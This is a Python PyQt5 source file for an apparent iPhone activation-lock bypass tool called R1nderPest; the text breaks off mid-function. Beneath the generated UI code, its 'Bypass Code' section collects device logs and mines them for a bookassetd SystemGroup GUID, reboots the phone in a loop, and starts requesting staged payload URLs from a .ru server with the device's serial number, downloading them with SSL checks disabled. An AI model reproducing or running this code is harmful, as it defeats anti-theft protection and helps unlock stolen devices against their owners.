# -*- coding: utf-8 -*-

# Form implementation generated from reading ui file '.\r1nderpest.ui'
#
# Created by: PyQt5 UI code generator 5.15.5
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again.  Do not edit this file unless you know what you are doing.

import ctypes
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtGui import QFontDatabase, QFont
import os
import threading
import time
import subprocess
import datetime
from colorama import *
import sys
import re
import shutil
import sqlite3
import atexit
import urllib.parse
import json
import struct
import binascii
from collections import Counter
import getpass

base_dir = os.path.dirname(__file__)

ctypes.windll.shcore.SetProcessDpiAwareness(0)

class Ui_MainWindow(object):
    def __init__(self):
        self.api_url = "https://codex-r1nderpest-a12.ru//get2.php"  # Используем HTTP вместо HTTPS
        self.timeouts = {
            'asset_wait': 300,
            'asset_delete_delay': 15,
            'reboot_wait': 300,
            'syslog_collect': 180
        }
        self.mount_point = os.path.join(os.path.expanduser("~"), f".ifuse_mount_{os.getpid()}")
        self.afc_mode = None
        self.device_info = {}
        self.guid = None
        self.attempt_count = 0
        self.max_attempts = 10
        self.global_GUID = ""
    def setupUi(self, MainWindow):
        QFontDatabase.addApplicationFont(os.path.join(base_dir, "./fonts/FuturaCyrillicBold.ttf"))
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(909, 540)
        MainWindow.setMinimumSize(QtCore.QSize(909, 540))
        MainWindow.setMaximumSize(QtCore.QSize(909, 540))
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.Intro = QtWidgets.QFrame(self.centralwidget)
        self.Intro.setGeometry(QtCore.QRect(-10, -10, 921, 601))
        self.Intro.setStyleSheet("background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(25, 25, 25, 255), stop:1 rgba(1, 27, 59, 255));\n"
"border-radius: 0px;")
        self.Intro.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.Intro.setFrameShadow(QtWidgets.QFrame.Raised)
        self.Intro.setObjectName("Intro")
        self.label = QtWidgets.QLabel(self.Intro)
        self.label.setGeometry(QtCore.QRect(400, 0, 601, 551))
        self.label.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label.setText("")
        self.label.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/glow_phone.png")))
        self.label.setScaledContents(True)
        self.label.setObjectName("label")
        self.label_2 = QtWidgets.QLabel(self.Intro)
        self.label_2.setGeometry(QtCore.QRect(40, 210, 671, 51))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(30)
        font.setBold(True)
        font.setWeight(75)
        self.label_2.setFont(font)
        self.label_2.setStyleSheet("background-color: rgba(255, 255, 255, 0);\n"
"color: rgb(255, 255, 255);")
        self.label_2.setObjectName("label_2")
        self.label_7 = QtWidgets.QLabel(self.Intro)
        self.label_7.setGeometry(QtCore.QRect(-20, 60, 961, 531))
        self.label_7.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_7.setText("")
        self.label_7.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/bg_GLOW.png")))
        self.label_7.setScaledContents(True)
        self.label_7.setObjectName("label_7")
        self.label_9 = QtWidgets.QLabel(self.Intro)
        self.label_9.setGeometry(QtCore.QRect(80, 110, 371, 131))
        self.label_9.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_9.setText("")
        self.label_9.setPixmap(QtGui.QPixmap(".\\img/logo (1).png"))
        self.label_9.setScaledContents(True)
        self.label_9.setObjectName("label_9")
        self.label_10 = QtWidgets.QLabel(self.Intro)
        self.label_10.setGeometry(QtCore.QRect(44, 260, 441, 101))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.label_10.setFont(font)
        self.label_10.setStyleSheet("background-color: rgba(255, 255, 255, 0);\n"
"color: rgb(255, 255, 255, 187);")
        self.label_10.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
        self.label_10.setWordWrap(True)
        self.label_10.setObjectName("label_10")
        self.label_11 = QtWidgets.QLabel(self.Intro)
        self.label_11.setGeometry(QtCore.QRect(110, 370, 311, 41))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(14)
        font.setBold(True)
        font.setWeight(75)
        self.label_11.setFont(font)
        self.label_11.setStyleSheet("background-color: rgba(255, 255, 255, 0);\n"
"color: rgb(255, 255, 255);")
        self.label_11.setAlignment(QtCore.Qt.AlignCenter)
        self.label_11.setWordWrap(True)
        self.label_11.setObjectName("label_11")
        self.frame_5 = QtWidgets.QFrame(self.Intro)
        self.frame_5.setGeometry(QtCore.QRect(110, 370, 311, 41))
        self.frame_5.setStyleSheet("background-color: rgba(0, 0, 0, 46);\n"
"border-radius: 15px;")
        self.frame_5.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_5.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_5.setObjectName("frame_5")
        self.label.raise_()
        self.label_7.raise_()
        self.label_9.raise_()
        self.label_2.raise_()
        self.label_10.raise_()
        self.frame_5.raise_()
        self.label_11.raise_()
        self.HomePage = QtWidgets.QFrame(self.centralwidget)
        self.HomePage.setGeometry(QtCore.QRect(0, -10, 921, 601))
        self.HomePage.setStyleSheet("background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(25, 25, 25, 255), stop:1 rgba(1, 27, 59, 255));\n"
"border-radius: 0px;")
        self.HomePage.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.HomePage.setFrameShadow(QtWidgets.QFrame.Raised)
        self.HomePage.setObjectName("HomePage")
        self.label_3 = QtWidgets.QLabel(self.HomePage)
        self.label_3.setGeometry(QtCore.QRect(60, 70, 201, 421))
        self.label_3.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_3.setText("")
        self.label_3.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/ios26hello.png")))
        self.label_3.setScaledContents(True)
        self.label_3.setObjectName("label_3")
        self.DeviceName = QtWidgets.QLabel(self.HomePage)
        self.DeviceName.setGeometry(QtCore.QRect(330, 100, 491, 41))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(28)
        font.setBold(True)
        font.setWeight(75)
        self.DeviceName.setFont(font)
        self.DeviceName.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.DeviceName.setObjectName("DeviceName")
        self.UDID = QtWidgets.QLabel(self.HomePage)
        self.UDID.setGeometry(QtCore.QRect(340, 160, 491, 41))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(16)
        font.setBold(True)
        font.setWeight(75)
        self.UDID.setFont(font)
        self.UDID.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.UDID.setObjectName("UDID")
        self.iOSVersion = QtWidgets.QLabel(self.HomePage)
        self.iOSVersion.setGeometry(QtCore.QRect(340, 210, 491, 41))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(16)
        font.setBold(True)
        font.setWeight(75)
        self.iOSVersion.setFont(font)
        self.iOSVersion.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.iOSVersion.setObjectName("iOSVersion")
        self.ProductType = QtWidgets.QLabel(self.HomePage)
        self.ProductType.setGeometry(QtCore.QRect(340, 260, 491, 41))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(16)
        font.setBold(True)
        font.setWeight(75)
        self.ProductType.setFont(font)
        self.ProductType.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.ProductType.setObjectName("ProductType")
        self.ProductType_2 = QtWidgets.QLabel(self.HomePage)
        self.ProductType_2.setGeometry(QtCore.QRect(340, 360, 491, 41))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(16)
        font.setBold(True)
        font.setWeight(75)
        self.ProductType_2.setFont(font)
        self.ProductType_2.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.ProductType_2.setObjectName("ProductType_2")
        self.ProductType_3 = QtWidgets.QLabel(self.HomePage)
        self.ProductType_3.setGeometry(QtCore.QRect(480, 360, 491, 41))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(16)
        font.setBold(True)
        font.setWeight(75)
        self.ProductType_3.setFont(font)
        self.ProductType_3.setStyleSheet("color: rgb(34, 255, 16);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.ProductType_3.setObjectName("ProductType_3")
        self.label_6 = QtWidgets.QLabel(self.HomePage)
        self.label_6.setGeometry(QtCore.QRect(50, 450, 221, 151))
        self.label_6.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_6.setText("")
        self.label_6.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./cable.png")))
        self.label_6.setScaledContents(True)
        self.label_6.setObjectName("label_6")
        self.label_8 = QtWidgets.QLabel(self.HomePage)
        self.label_8.setGeometry(QtCore.QRect(640, 10, 281, 101))
        self.label_8.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_8.setText("")
        self.label_8.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./logo (1).png")))
        self.label_8.setScaledContents(True)
        self.label_8.setObjectName("label_8")
        self.activateButton = QtWidgets.QPushButton(self.HomePage)
        self.activateButton.setGeometry(QtCore.QRect(330, 415, 504, 41))
        font = QtGui.QFont()
        font.setFamily("MS Shell Dlg 2")
        font.setPointSize(14)
        self.activateButton.setFont(font)
        self.activateButton.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.activateButton.setStyleSheet("background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(21, 151, 255, 255), stop:1 rgba(113, 163, 168, 255));\n"
"color: rgb(255, 255, 255);\n"
"border-radius: 15px;")
        self.activateButton.setObjectName("activateButton")
        self.pbFrame = QtWidgets.QFrame(self.HomePage)
        self.pbFrame.setGeometry(QtCore.QRect(330, 470, 504, 12))
        self.pbFrame.setStyleSheet("background-color: rgb(2, 33, 51);\n"
"color: rgb(255, 255, 255);\n"
"border-radius: 5px;")
        self.pbFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.pbFrame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.pbFrame.setObjectName("pbFrame")
        self.pb = QtWidgets.QFrame(self.pbFrame)
        self.pb.setGeometry(QtCore.QRect(0, 0, 0, 12))
        self.pb.setStyleSheet("background-color: rgb(19, 159, 255);\n"
"color: rgb(255, 255, 255);\n"
"border-radius: 5px;")
        self.pb.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.pb.setFrameShadow(QtWidgets.QFrame.Raised)
        self.pb.setObjectName("pb")
        self.frame = QtWidgets.QFrame(self.HomePage)
        self.frame.setGeometry(QtCore.QRect(330, 160, 501, 41))
        self.frame.setStyleSheet("background-color: rgba(0, 0, 0, 46);\n"
"border-radius: 10px;")
        self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame.setObjectName("frame")
        self.frame_2 = QtWidgets.QFrame(self.HomePage)
        self.frame_2.setGeometry(QtCore.QRect(330, 210, 501, 41))
        self.frame_2.setStyleSheet("background-color: rgba(0, 0, 0, 46);\n"
"border-radius: 10px;")
        self.frame_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_2.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_2.setObjectName("frame_2")
        self.frame_3 = QtWidgets.QFrame(self.HomePage)
        self.frame_3.setGeometry(QtCore.QRect(330, 260, 501, 41))
        self.frame_3.setStyleSheet("background-color: rgba(0, 0, 0, 46);\n"
"border-radius: 10px;")
        self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_3.setObjectName("frame_3")
        self.frame_4 = QtWidgets.QFrame(self.HomePage)
        self.frame_4.setGeometry(QtCore.QRect(330, 360, 501, 41))
        self.frame_4.setStyleSheet("background-color: rgba(0, 0, 0, 46);\n"
"border-radius: 10px;")
        self.frame_4.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_4.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_4.setObjectName("frame_4")
        self.frame_6 = QtWidgets.QFrame(self.HomePage)
        self.frame_6.setGeometry(QtCore.QRect(330, 310, 501, 41))
        self.frame_6.setStyleSheet("background-color: rgba(0, 0, 0, 46);\n"
"border-radius: 10px;")
        self.frame_6.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.frame_6.setFrameShadow(QtWidgets.QFrame.Raised)
        self.frame_6.setObjectName("frame_6")
        self.ActivationState = QtWidgets.QLabel(self.HomePage)
        self.ActivationState.setGeometry(QtCore.QRect(340, 310, 491, 41))
        font = QtGui.QFont()
        font.setFamily("Futura Cyrillic Bold")
        font.setPointSize(16)
        font.setBold(True)
        font.setWeight(75)
        self.ActivationState.setFont(font)
        self.ActivationState.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.ActivationState.setObjectName("ActivationState")
        self.DeviceName.raise_()
        self.label_6.raise_()
        self.label_3.raise_()
        self.label_8.raise_()
        self.activateButton.raise_()
        self.pbFrame.raise_()
        self.frame.raise_()
        self.UDID.raise_()
        self.frame_2.raise_()
        self.iOSVersion.raise_()
        self.frame_3.raise_()
        self.ProductType.raise_()
        self.frame_4.raise_()
        self.ProductType_2.raise_()
        self.ProductType_3.raise_()
        self.frame_6.raise_()
        self.ActivationState.raise_()
        self.Done = QtWidgets.QFrame(self.centralwidget)
        self.Done.setGeometry(QtCore.QRect(0, -10, 921, 601))
        self.Done.setStyleSheet("background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(25, 25, 25, 255), stop:1 rgba(1, 27, 59, 255));\n"
"border-radius: 0px;")
        self.Done.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.Done.setFrameShadow(QtWidgets.QFrame.Raised)
        self.Done.setObjectName("Done")
        self.label_17 = QtWidgets.QLabel(self.Done)
        self.label_17.setGeometry(QtCore.QRect(60, 70, 201, 421))
        self.label_17.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_17.setText("")
        self.label_17.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/ios26hello.png")))
        self.label_17.setScaledContents(True)
        self.label_17.setObjectName("label_17")
        self.label_19 = QtWidgets.QLabel(self.Done)
        self.label_19.setGeometry(QtCore.QRect(320, 90, 451, 41))
        self.label_19.setObjectName("label_19")
        self.DeviceName_3 = QtWidgets.QLabel(self.Done)
        self.DeviceName_3.setGeometry(QtCore.QRect(330, 100, 491, 41))
        font = QtGui.QFont()
        font.setFamily("Futura")
        font.setPointSize(36)
        self.DeviceName_3.setFont(font)
        self.DeviceName_3.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.DeviceName_3.setObjectName("DeviceName_3")
        self.UDID_3 = QtWidgets.QLabel(self.Done)
        self.UDID_3.setGeometry(QtCore.QRect(330, 160, 491, 171))
        font = QtGui.QFont()
        font.setFamily("Futura")
        font.setPointSize(18)
        self.UDID_3.setFont(font)
        self.UDID_3.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgba(255, 255, 255, 0);")
        self.UDID_3.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
        self.UDID_3.setWordWrap(True)
        self.UDID_3.setObjectName("UDID_3")
        self.label_20 = QtWidgets.QLabel(self.Done)
        self.label_20.setGeometry(QtCore.QRect(50, 450, 221, 151))
        self.label_20.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_20.setText("")
        self.label_20.setPixmap(QtGui.QPixmap(os.path.join(base_dir, "./img/cable.png")))
        self.label_20.setScaledContents(True)
        self.label_20.setObjectName("label_20")
        self.label_21 = QtWidgets.QLabel(self.Done)
        self.label_21.setGeometry(QtCore.QRect(640, 10, 281, 101))
        self.label_21.setStyleSheet("background-color: rgba(255, 255, 255, 0);")
        self.label_21.setText("")
        self.label_21.setPixmap(QtGui.QPixmap(".\\logo (1).png"))
        self.label_21.setScaledContents(True)
        self.label_21.setObjectName("label_21")
        self.backToHomePage = QtWidgets.QPushButton(self.Done)
        self.backToHomePage.setGeometry(QtCore.QRect(330, 440, 481, 41))
        font = QtGui.QFont()
        font.setFamily("Futura")
        font.setPointSize(18)
        self.backToHomePage.setFont(font)
        self.backToHomePage.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
        self.backToHomePage.setStyleSheet("background-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(21, 151, 255, 255), stop:1 rgba(113, 163, 168, 255));\n"
"color: rgb(255, 255, 255);\n"
"border-radius: 15px;")
        self.backToHomePage.setObjectName("backToHomePage")
        self.label_19.raise_()
        self.label_20.raise_()
        self.label_21.raise_()
        self.label_17.raise_()
        self.DeviceName_3.raise_()
        self.UDID_3.raise_()
        self.backToHomePage.raise_()
        self.Done.raise_()
        self.HomePage.raise_()
        self.Intro.raise_()
        MainWindow.setCentralWidget(self.centralwidget)

        self.HomePage.hide()
        self.Done.hide()


        


        searchThread = threading.Thread(target=self.SearchingDevices)
        searchThread.start()

        self.activateButton.clicked.connect(self.StartThread)

        

        self.retranslateUi(MainWindow)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    ## Bypass Code

    def _run_cmd(self, cmd, timeout=None):
        try:
            res = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
            return res.returncode, res.stdout.strip(), res.stderr.strip()
        except subprocess.TimeoutExpired:
            return 124, "", "Timeout"
        except Exception as e:
            return 1, "", str(e)


    def _curl_download(self, url, output_file):
        """Download with SSL verification disabled"""
        curl_cmd = [
            "curl", "-L", 
            "-k",  # ← КЛЮЧЕВОЕ: отключает проверку SSL
            "-f",  # Fail on HTTP errors
            "--connect-timeout", "30",
            "--max-time", "120",
            "-o", output_file,
            url
        ]
        
        self.log(f"Downloading: {url}", "info")
        code, out, err = self._run_cmd(curl_cmd)
        
        if code != 0:
            self.log(f"Download failed (code {code}): {err}", "error")
            return False
            
        if os.path.exists(output_file) and os.path.getsize(output_file) > 0:
            self.log(f"Download successful: {os.path.getsize(output_file)} bytes", "info")
            return True
        else:
            self.log("Download failed: empty file", "error")
            return False

    def reboot_device(self):
        """Reboots device and waits for readiness"""
        self.log("Rebooting device...", "info")
        
        # Try using pymobiledevice3 for reboot
        code, _, err = self._run_cmd([f"C:/Users/{getpass.getuser()}/AppData/Local/Programs/Python/Python313/Scripts/pymobiledevice3.exe", "restart"])
        if code != 0:
            # Fallback to C:/R1nderPest/libimobiledevice/idevicediagnostics.exe
            code, _, err = self._run_cmd(["C:/R1nderPest/libimobiledevice/idevicediagnostics.exe", "restart"])
            if code != 0:
                self.log(f"Soft reboot failed: {err}", "warn")
                self.log("Please reboot device manually and press Enter to continue...", "warn")
                input()
                return True
        
        self.log("Device reboot command sent, waiting for reconnect...", "info")
        
        # Wait for device reboot
        for i in range(60):  # 60 attempts × 5 seconds = 5 minutes
            time.sleep(5)
            code, _, _ = self._run_cmd(["C:/R1nderPest/libimobiledevice/ideviceinfo.exe"])
            if code == 0:
                self.log(f"Device reconnected after {i * 5} seconds", "success")
                # Give device extra time for full boot
                time.sleep(10)
                return True
            
            if i % 6 == 0:  # Every 30 seconds
                self.log(f"Still waiting for device... ({i * 5} seconds)", "info")
        
        self.log("Device did not reconnect in time", "error")
        return False

    def verify_dependencies(self):
        self.log("Verifying System Requirements...", "info")
        if shutil.which("ifuse"):
            self.afc_mode = "ifuse"
        else:
            self.afc_mode = f"C:/Users/{getpass.getuser()}/AppData/Local/Programs/Python/Python313/Scripts/pymobiledevice3.exe"
        self.log(f"AFC Transfer Mode: {self.afc_mode}", "info")

    def mount_afc(self):
        if self.afc_mode != "ifuse":
            return True
        os.makedirs(self.mount_point, exist_ok=True)
        code, out, _ = self._run_cmd(["mount"])
        if self.mount_point in out:
            return True
        for i in range(5):
            code, _, _ = self._run_cmd(["ifuse", self.mount_point])
            if code == 0:
                return True
            time.sleep(2)
        self.log("Failed to mount via ifuse", "error")
        return False

    def unmount_afc(self):
        if self.afc_mode == "ifuse" and os.path.exists(self.mount_point):
            self._run_cmd(["umount", self.mount_point])
            try:
                os.rmdir(self.mount_point)
            except OSError:
                pass

    def _cleanup(self):
        """Ensure cleanup on exit"""
        self.unmount_afc()

    def detect_device(self):
        self.log("Detecting Device...", "info")
        code, out, err = self._run_cmd(["C:/R1nderPest/libimobiledevice/ideviceinfo.exe"])
        if code != 0:
            self.log(f"Device not found. Error: {err or 'Unknown'}", "error")
            sys.exit(1)
        
        info = {}
        for line in out.splitlines():
            if ": " in line:
                key, val = line.split(": ", 1)
                info[key.strip()] = val.strip()
        self.device_info = info
        
        print(f"UDID: {info.get('UniqueDeviceID','?')}")
        
        if info.get('ActivationState') == 'Activated':
            print(f"{Style.YELLOW}Warning: Device already activated.{Style.RESET}")

    def get_guid_manual(self):
        """Manual GUID input with validation"""
        print(f"\n{Style.YELLOW}⚠ GUID Input Required{Style.RESET}")
        print(f"   Format: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX")
        print(f"   Example: 2A22A82B-C342-444D-972F-5270FB5080DF")
        
        UUID_PATTERN = re.compile(r'^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}$', re.IGNORECASE)
        
        while True:
            guid_input = input(f"\n{Style.BLUE}➤ Enter SystemGroup GUID:{Style.RESET} ").strip()
            if UUID_PATTERN.match(guid_input):
                return guid_input.upper()
            print(f"{Style.RED}❌ Invalid format. Must be 8-4-4-4-12 hex characters (e.g. 2A22A82B-C342-444D-972F-5270FB5080DF).{Style.RESET}")

    def parse_tracev3_structure(self, data):
        """Parses tracev3 file structure for more precise search"""
        signatures = []
        
        # Search for database-related strings
        db_patterns = [
            b'BLDatabaseManager',
            b'BLDatabase',
            b'BLDatabaseManager.sqlite', 
            b'bookassetd [Database]: Store is at file:///private/var/containers/Shared/SystemGroup',
        ]
        
        for pattern in db_patterns:
            pos = 0
            while True:
                pos = data.find(pattern, pos)
                if pos == -1:
                    break
                signatures.append(('string', pattern, pos))
                pos += len(pattern)
        
        return signatures

    def extract_guid_candidates(self, data, context_pos, window_size=512):
        """Extracts GUIDs with contextual analysis"""
        candidates = []
        
        # Extended GUID pattern
        guid_pattern = re.compile(
            rb'([0-9A-F]{8}[-][0-9A-F]{4}[-][0-9A-F]{4}[-][0-9A-F]{4}[-][0-9A-F]{12})',
            re.IGNORECASE
        )
        
        # Search in context window
        start = max(0, context_pos - window_size)
        end = min(len(data), context_pos + window_size)
        context_data = data[start:end]
        
        # GUID search
        for match in guid_pattern.finditer(context_data):
            guid = match.group(1).decode('ascii').upper()
            relative_pos = match.start() + start - context_pos
            
            # Extended GUID validation
            if self.validate_guid_structure(guid):
                candidates.append({
                    'guid': guid,
                    'position': relative_pos,
                    'context': self.get_context_string(context_data, match.start(), match.end())
                })
        
        return candidates

    def validate_guid_structure(self, guid):
        """Extended GUID structure validation"""
        try:
            # Check GUID version (RFC 4122)
            parts = guid.split('-')
            if len(parts) != 5:
                return False
            
            # Check part lengths
            if len(parts[0]) != 8 or len(parts[1]) != 4 or len(parts[2]) != 4 or len(parts[3]) != 4 or len(parts[4]) != 12:
                return False
            
            # Check hex characters
            hex_chars = set('0123456789ABCDEF')
            clean_guid = guid.replace('-', '')
            if not all(c in hex_chars for c in clean_guid):
                return False
            
            # Check version (4th character of 3rd group should be 4)
            version_char = parts[2][0]
            if version_char not in '4':
                return False  # iOS commonly uses version 4
            
            # Check variant (8,9,A,B - 2 high bits)
            variant_char = parts[3][0]
            if variant_char not in '89AB':
                return False
            
            return True
            
        except Exception:
            return False

    def get_context_string(self, data, start, end, context_size=50):
        """Gets context string around GUID"""
        context_start = max(0, start - context_size)
        context_end = min(len(data), end + context_size)
        
        context = data[context_start:context_end]
        try:
            # Try to decode as text
            return context.decode('utf-8', errors='replace')
        except:
            # For binary data show hex
            return binascii.hexlify(context).decode('ascii')

    def analyze_guid_confidence(self, guid_candidates):
        """Analyzes confidence in found GUIDs"""
        if not guid_candidates:
            return None
        
        # Group by GUID
        guid_counts = Counter(candidate['guid'] for candidate in guid_candidates)
        
        # Calculate score for each GUID
        scored_guids = []
        for guid, count in guid_counts.items():
            score = count * 10  # Base score by occurrence count
            
            # Additional confidence factors
            positions = [c['position'] for c in guid_candidates if c['guid'] == guid]
            
            # Preference for GUIDs close to BLDatabaseManager
            close_positions = [p for p in positions if abs(p) < 100]
            if close_positions:
                score += len(close_positions) * 5
            
            # Preference for GUIDs before BLDatabaseManager (more common in logs)
            before_positions = [p for p in positions if p < 0]
            if before_positions:
                score += len(before_positions) * 3
            
            scored_guids.append((guid, score, count))
        
        # Sort by score
        scored_guids.sort(key=lambda x: x[1], reverse=True)
        return scored_guids

    def confirm_guid_manual(self, guid):

        self.log(f"GUID Successfully parsed! {guid}", type="success")
        
        response = "y"

        self.global_GUID = guid

        return response 

    def get_guid_enhanced(self):
        """Enhanced GUID extraction version"""
        self.attempt_count += 1
        self.log(f"GUID search attempt {self.attempt_count}/{self.max_attempts}", "attempt")
        
        udid = self.UDID.text().replace("UDID: ", "")
        log_path = f"{udid}.logarchive"
        
        try:
            self.activateButton.setText(f"⏳ Searching GUID (Attempt {self.attempt_count} / {self.max_attempts}) ...")
            # Collect logs
            self.log("Collecting device logs...", "info")
            code, _, err = self._run_cmd([f"C:/Users/{getpass.getuser()}/AppData/Local/Programs/Python/Python313/Scripts/pymobiledevice3.exe", "syslog", "collect", log_path], timeout=120)
            if code != 0:
                self.log(f"Log collection failed: {err}", "error")
                return None
            
            trace_file = os.path.join(log_path, "logdata.LiveData.tracev3")
            if not os.path.exists(trace_file):
                self.log("tracev3 file not found", "error")
                return None
            
            # Read and analyze file
            with open(trace_file, 'rb') as f:
                data = f.read()
            
            size_mb = len(data) / (1024 * 1024)
            self.log(f"Analyzing tracev3 ({size_mb:.1f} MB)...", "info")
            
            # Search for key structures
            signatures = self.parse_tracev3_structure(data)
            self.log(f"Found {len(signatures)} relevant signatures", "info")
            
            # Collect GUID candidates
            all_candidates = []
            bl_database_positions = []
            
            for sig_type, pattern, pos in signatures:
                if pattern == b'BLDatabaseManager':
                    bl_database_positions.append(pos)
                    candidates = self.extract_guid_candidates(data, pos)
                    all_candidates.extend(candidates)
                    
                    if candidates:
                        self.log(f"Found {len(candidates)} GUID candidates near BLDatabaseManager at 0x{pos:x}", "info")
            
            if not all_candidates:
                self.log("No valid GUID candidates found", "error")
                return None
            
            # Confidence analysis
            scored_guids = self.analyze_guid_confidence(all_candidates)
            if not scored_guids:
                return None
            
            # Log results
            self.log("GUID confidence analysis:", "info")
            for guid, score, count in scored_guids[:5]:
                self.log(f"  {guid}: score={score}, occurrences={count}", "info")
            
            best_guid, best_score, best_count = scored_guids[0]
            
            # Determine confidence level
            if best_score >= 30:
                confidence = "HIGH"
                self.log(f"✅ HIGH CONFIDENCE: {best_guid} (score: {best_score})", "success")
            elif best_score >= 15:
                confidence = "MEDIUM" 
                self.log(f"⚠️ MEDIUM CONFIDENCE: {best_guid} (score: {best_score})", "warn")
            else:
                confidence = "LOW"
                self.log(f"⚠️ LOW CONFIDENCE: {best_guid} (score: {best_score})", "warn")
            
            # Additional verification for low confidence
            if confidence in ["LOW", "MEDIUM"]:
                self.log("Requesting manual confirmation for low-confidence GUID...", "warn")
                if not self.confirm_guid_manual(best_guid):
                    return None
            
            return best_guid
            
        finally:
            # Cleanup
            if os.path.exists(log_path):
                shutil.rmtree(log_path)

    def get_guid_auto_with_retry(self):
        """Auto-detect GUID with reboot retry mechanism"""
        self.attempt_count = 0
        
        while self.attempt_count < self.max_attempts:
            guid = self.get_guid_enhanced()
            
            if guid:
                return guid
            
            # If not last attempt - reboot device
            if self.attempt_count < self.max_attempts:
                self.log(f"GUID not found in attempt {self.attempt_count}. Rebooting device and retrying...", "warn")
                self.log(text="WARNING! THIS IS NOT AN ERROR, JUST WAIT WHILE WE ARE SEARCHING FOR THE GUID!", type="warn")
                self.log(text="WARNING! THIS IS NOT AN ERROR, JUST WAIT WHILE WE ARE SEARCHING FOR THE GUID!", type="warn")
                self.log(text="WARNING! THIS IS NOT AN ERROR, JUST WAIT WHILE WE ARE SEARCHING FOR THE GUID!", type="warn")

                if not self.reboot_device():
                    self.log("Failed to reboot device, continuing anyway...", "warn")
                
                # After reboot re-detect device
                self.log("Re-detecting device after reboot...", "info")
                self.detect_device()
                
                # Small pause before next attempt
                time.sleep(5)
            else:
                self.log(f"All {self.max_attempts} attempts exhausted", "error")
        
        return None

    def get_guid_auto(self):
        """Auto-detect GUID using enhanced method with retry"""
        return self.get_guid_auto_with_retry()

    def get_all_urls_from_server(self, prd, guid, sn):
        """Requests all three URLs (stage1, stage2, stage3) from the server"""
        params = f"prd={prd}&guid={guid}&sn={sn}"
        url = f"{self.api_url}?{params}"

        self.log(text="Requesting all URLs from server: {url}", type="info")
        
        # Используем curl с отключенной SSL проверкой
